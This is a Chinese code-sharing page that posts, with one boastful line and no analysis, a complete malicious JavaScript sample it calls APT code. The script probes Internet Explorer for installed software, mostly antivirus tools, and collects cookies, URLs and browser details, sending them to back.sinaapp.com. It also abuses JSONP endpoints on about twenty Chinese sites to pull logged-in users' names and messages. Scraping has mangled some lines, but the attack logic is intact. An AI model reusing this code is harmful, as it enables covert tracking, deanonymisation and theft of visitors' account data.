首页 > 代码库 > 抓到一个搞APT的JS
抓到一个搞APT的JS
代码具体有什么用我就不说了,有多屌自己看撒。
//使用Javascript并结合RES协议判断软件是否存在。//havesoft变量用于保存存在软件的信息var havesoft = ‘no ie ‘; function program(name, path){ this.name = name; this.path = path;}//设置需要遍历的磁盘,默认为扫描C,D。var disk=[‘c‘,‘d‘]; //变量soft部分设置的是需要检测软件安装的常见路径和相应的资源编号。 var soft=[new program(‘office 2003‘, ‘:\\Program Files\\Microsoft Office\\OFFICE11\\STSLIST.DLL/2/10100‘), new program(‘office2007‘, ‘:\\Program Files\\Microsoft Office\\Office12\\OUTLOOK.EXE/2/5500‘), new program(‘360安全卫士‘, ‘:\\Program Files\\360\\360Safe\\360leakfixer.exe/2/110‘), new program(‘360保险箱‘, ‘:\\Program Files\\360\\360safebox\\BoxChecker.exe/2/203‘), new program(‘WinRAR‘, ‘:\\Program Files\\WinRAR\\WinRAR.exe/2/101‘), new program(‘QQ 2009‘, ‘:\\Program Files\\Tencent\\QQ\\Bin\\RICHED20.DLL/2/2100‘), new program(‘暴风影音‘, ‘:\\Program Files\\StormII\\StormSkinRes.dll/2/193‘), new program(‘迅雷‘, ‘:\\Program Files\\Thunder Network\\Thunder\\Program\\Thunder.exe/2/138‘), new program(‘360杀毒‘, ‘:\\Program Files\\360\\360sd\\mfc42u.dll/2/26567‘), new program(‘Foxit Reader‘, ‘:\\Program Files\\Foxit Software\\Foxit Reader\\Foxit Reader.exe/2/279‘), new program(‘Visual C++ 6.0‘, ‘:\\Program Files\\Microsoft Visual Studio\\VC98\\Setup\\1033\\VC98ENT.DLL/2/101‘), new program(‘Visual Studio 2008‘, ‘:\\Program Files\\Microsoft Visual Studio 9.0\\Common7\\IDE\\devenv.exe/2/6609‘), new program(‘VMware‘, ‘:\\Program Files\\VMware\\VMware Workstation\\p2vWizard.dll/2/134‘), new program(‘Maxthon2‘, ‘:\\Program Files\\Maxthon2\\Maxthon.exe/2/128‘), new program(‘Daemon Tools lite‘, ‘:\\Program Files\\DAEMON Tools Lite\\DTCommonRes.dll/2/209‘), new program(‘EditPlus 3‘, ‘:\\Program Files\\EditPlus 3\\editplus.exe/2/126‘), new program(‘TrueCrypt‘, ‘:\\Program Files\\TrueCrypt\\TrueCrypt.exe/2/112‘), new program(‘Foxmail‘, ‘:\\Program Files\\Foxmail\\foxmail.exe/2/RAM‘), new program(‘Nod32 AntiVirus‘, ‘:\\Program Files\\ESET\\ESET NOD32 Antivirus\\mfc80.dll/2/32384‘), new program(‘Nmap‘, ‘:\\Program Files\\Nmap\\Uninstall.exe/2/110‘), new program(‘WinSCP‘, ‘:\\Program Files\\WinSCP\\WinSCP.exe/2/BBALL‘), new program(‘Kaspersky Internet Security 2010‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 2010\\avzkrnl.dll/2/BBALL‘), new program(‘瑞星杀毒‘, ‘:\\Program Files\\Rising\\Rav\\RsConfig.dll/2/100‘), new program(‘BitDefender 2010‘, ‘:\\Program Files\\BitDefender\\BitDefender 2010\\history.exe/2/301‘), new program(‘Avast4‘, ‘:\\Program Files\\Alwil Software\\Avast4\\ashAvast.exe/2/267‘), new program(‘Avira AntiVir Desktop‘, ‘:\\Program Files\\Avira\\AntiVir Desktop\\rcimage.dll/2/106‘), new program(‘F-Secure‘, ‘:\\Program Files\\F-Secure\\Anti-Virus\\fsavinst.dll/2/100‘), new program(‘McAfee VirusScan Enterprise‘, ‘:\\Program Files\\McAfee\\VirusScan Enterprise\\nailite.dll/2/110‘), new program(‘金山毒霸‘, ‘:\\Program Files\\Kingsoft\\Kingsoft Antivirus\\krecycle.exe/2/130‘), new program(‘趋势安全专家‘, ‘:\\Program Files\\Trend Micro\\Internet Security\\TmChLang.exe/2/30994‘), new program(‘Kaspersky Internet Security 6.0‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\oeas.dll/2/206‘), new program(‘Kaspersky Internet Security 7.0‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\oeas.dll/2/206‘), new program(‘Kaspersky Internet Security 2009‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 2009\\oeas.dll/2/206‘), new program(‘AVG AntiVirus 9‘, ‘:\\Program Files\\AVG\\AVG9\\avguires.dll/2/100‘), new program(‘江民杀毒‘, ‘:\\Program Files\\JiangMin\\AntiVirus\\KvpViewer.exe/2/133‘), new program(‘ZoneAlarm‘, ‘:\\Program Files\\Zone Labs\\ZoneAlarm\\framewrk.dll/2/102‘), new program(‘我形我速4‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 4.0\\Uipares.dll/2/143‘), new program(‘我形我速5‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 5\\ipeBmp.dll/2/324‘), new program(‘我形我速6‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 6\\ROBOEX32.DLL/2/145‘), new program(‘我形我速4‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 4.0\\Uipares.dll/2/143‘), new program(‘我形我速5‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 5\\ipeBmp.dll/2/324‘), new program(‘我形我速6‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 6\\ROBOEX32.DLL/2/145‘), new program(‘Adobe Reader 9.0‘, ‘:\\Program Files\\Adobe\\Reader 9.0\\Reader\\AcroRd32.dll/2/103‘)];//开始通过循环分别匹配磁盘和相应的文件,并判断文件是否存在,如果存在就说明存在软件。if(navigator.userAgent.indexOf("MSIE")>= 0){ havesoft =‘ ‘; for(i=0;i<soft.length;i++) { for(j=0;j<disk.length;j++) { var img=new Image(); //创建新的Image对象 res=‘res://‘+disk[j]+soft[i].path; //通过RES协议引入资源文件 img.src=http://www.mamicode.com/res; //将RES资源文件赋给img if(img.height!=30 || img.width != 28) //判断高度是否不等于30或者宽度不等于20,如果不等于,则认为有这个图片。 { havesoft = havesoft + soft[i].name + ‘, ‘; } } }}(function(){(new Image()).src=http://www.mamicode.com/‘http://back.sinaapp.com/index.php?do=api&id=bt1kyY&location=‘+escape((function(){try{return document.location.href}catch(e){return ‘‘}})())+‘&toplocation=‘+escape((function(){try{return top.location.href}catch(e){return ‘‘}})())+‘&softver=‘+escape((function(){try{return havesoft}catch(e){return ‘‘}})())+‘&opener=‘+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:‘‘}catch(e){return ‘‘}})());})();window.onerror=function(){ return true;}http_server = "http://back.sinaapp.com/index.php?do=api&id=bt1kyY&content1=";var info = {};info.browser = function(){ ua = navigator.userAgent.toLowerCase(); var rwebkit = /(webkit)[ \/]([\w.]+)/; var ropera = /(opera)(?:.*version)?[ \/]([\w.]+)/; var rmsie = /(msie) ([\w.]+)/; var rmozilla = /(mozilla)(?:.*? rv:([\w.]+))?/; var match = rwebkit.exec( ua ) || ropera.exec( ua ) || rmsie.exec( ua ) || ua.indexOf("compatible") < 0 && rmozilla.exec( ua ) || []; return { name: match[1] || "", version: match[2] || "0" };}();info.url = document.location.href;info.ua = escape(navigator.userAgent);info.lang = navigator.language;info.referrer = document.referrer;info.location = window.location.href;info.toplocation = top.location.href;info.cookie = escape(document.cookie);info.domain = document.domain;info.title = document.title;info.screen = function(){ var c = ""; if (self.screen) { c = screen.width+"x"+screen.height; } return c;}();info.flash = function(){ var f="",n=navigator; if (n.plugins && n.plugins.length) { for (var ii=0;ii<n.plugins.length;ii++) { if (n.plugins[ii].name.indexOf(‘Shockwave Flash‘)!=-1) { f=n.plugins[ii].description.split(‘Shockwave Flash ‘)[1]; break; } } } else if (window.ActiveXObject) { for (var ii=10;ii>=2;ii--) { try { var fl=eval("new ActiveXObject(‘ShockwaveFlash.ShockwaveFlash."+ii+"‘);"); if (fl) { f=ii + ‘.0‘; break; } } catch(e) {} } } return f;}();function inj_script(a, b) { var o = document.createElement("script"); o.src = a; if (b) { if (!window.ActiveXObject) { o.onload = b; } else { o.onreadystatechange = function () { if (o.readyState == ‘loaded‘ || o.readyState == ‘complete‘) { b(); } } } } document.getElementsByTagName("body")[0].appendChild(o); return o;}function json2str(o) { if(typeof o == ‘string‘) return o; var arr = []; var fmt = function(s) { if (typeof s == ‘object‘ && s != null) return json2str(s); return /^(string|number)$/.test(typeof s) ? "‘" + s + "‘" : s; } for (var i in o) arr.push("‘" + i + "‘:" + fmt(o[i])); return ‘{‘ + arr.join(‘,‘) + ‘}‘;}video_login_callback = function(o){ new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=video_login_callback";}e163_comment = function(o){ new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=e163_comment";}weibo_login = function(o){ new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=weibo_login";}sina_1368631232407449 = function(o){ new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=sina_1368631232407449";}jingdong_service = function(o){ new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jingdong_service";}loginInfoJson = function(o){ new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=loginInfoJson";}hxbase_json1368703155802logininfo = function(o){ new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=hxbase_json1368703155802logininfo";}jsonp1368703516133 = function(o){ new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jsonp1368703516133";}ajaxLogan_updateNickName = function(o){ new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=ajaxLogan_updateNickName";}jsonp1368705676193 = function(o){ new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jsonp1368705676193";}jsonp1368706291697 = function(o){ new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jsonp1368706291697";}jsonp1368751970360 = function(o){ new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jsonp1368751970360";}jQuery1368754535817 = function(o){ new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jQuery1368754535817";}jQuery1368758656634 = function(o){ new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=jQuery1368758656634";}window.onload = function(){ new Image().src = http://www.mamicode.com/http_server + escape(json2str(info)) +"&content2=info%20"; try{ inj_script(‘http://video.baidu.com/d?m=uss&callback=video_login_callback‘); } catch(e){} try{ inj_script(‘http://comment.money.163.com/reply/check.jsp?time=1367240961474&callback=e163_comment‘); } catch(e){} try{ inj_script(‘http://weibo.com/ajaxlogin.php?framelogin=0&callback=weibo_login‘); } catch(e){} try{ inj_script(‘http://i.house.sina.com.cn/sso/get_cookie.php?callback=sina_1368631232407449‘); } catch(e){} try{ inj_script(‘http://passport.jd.com/new/helloService.ashx?m=ls&callback=jingdong_service‘); } catch(e){} try{ inj_script(‘http://i.bendi.taobao.com/userLoginInfo.do?callback=loginInfoJson&t=1368683974713‘); } catch(e){} try{ inj_script(‘http://shequ5.tool.hexun.com/rest/checkjson.aspx?callback=hxbase_json1368703155802logininfo‘); } catch(e){} try{ inj_script(‘http://i.56.com/api/getHomeLink.php?callback=jsonp1368703516133‘); } catch(e){} try{ inj_script(‘http://my.pconline.com.cn/intf/getLogedUser.jsp?callback=ajaxLogan_updateNickName‘); } catch(e){} try{ inj_script(‘http://passport.mop.com/common/user-info?callback=jsonp1368705676193‘); } catch(e){} try{ inj_script(‘http://jiaoyou.51.com/?c=grade&a=getMyInfoJsonp&callback=jsonp1368706291697&ie=0&_=1368706293192‘); } catch(e){} try{ inj_script(‘http://commapi.dangdang.com/api/toolbar_ads_api.php?jsoncallback=jsonp1368751970360‘); } catch(e){} try{ inj_script(‘http://lc.tiexue.net/p.tx?c=jQuery1368754535817&_=1368754537944‘); } catch(e){} try{ inj_script(‘http://passport.game.renren.com/user/info?callback=jQuery1368758656634&_=1368758656639‘); } catch(e){} try{ inj_script(‘http://random.blog.sohu.com/service/profile.jsp‘); } catch(e){} try{ inj_script(‘http://uis.i.sohu.com/api/passport.jsp?from=roll&_=1368671343288‘); } catch(e){} try{ inj_script(‘http://api.t.qq.com/inbox/pm_list.php?count1=30&t=wbpm_list.js&resp_charset=UTF8&first=1&pmlang=zh_TW&r=0.36978532862849534‘); } catch(e){} try{ inj_script(‘http://blog.ifeng.com/misc.php?script=getusername&tm=1368689210147‘); } catch(e){} try{ inj_script(‘http://www.tianya.cn/api/msg?method=messagesys.selectmessage¶ms.pageSize=1¶ms.pageNo=1&_=1368693252438&var=tianya_msg‘); } catch(e){} setTimeout(function(){ var o = Blog.camp.profile; new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=Blog.camp.profile"; } ,3000); setTimeout(function(){ var o = [_passport]; new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=%5B_passport%5D"; } ,3000); setTimeout(function(){ var o = PM.PMListLoaded().ma+‘|‘+PM.PMListLoaded().mn+‘|‘+PM.PMListLoaded().micn; new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=PM.PMListLoaded%28%29.ma%2B%27%7C%27%2BPM.PMListLoaded%28%29.mn%2B%27%7C%27%2BPM.PMListLoaded%28%29.micn"; } ,3000); setTimeout(function(){ var o = sso_username; new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=sso_username"; } ,3000); setTimeout(function(){ var o = tianya_msg.data.list[0].toUserName+‘|‘+tianya_msg.data.list[0].toUserId; new Image().src = http://www.mamicode.com/http_server + escape(json2str(o)) +"&content2=tianya_msg.data.list%5B0%5D.toUserName%2B%27%7C%27%2Btianya_msg.data.list%5B0%5D.toUserId"; } ,3000);};
抓到一个搞APT的JS
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。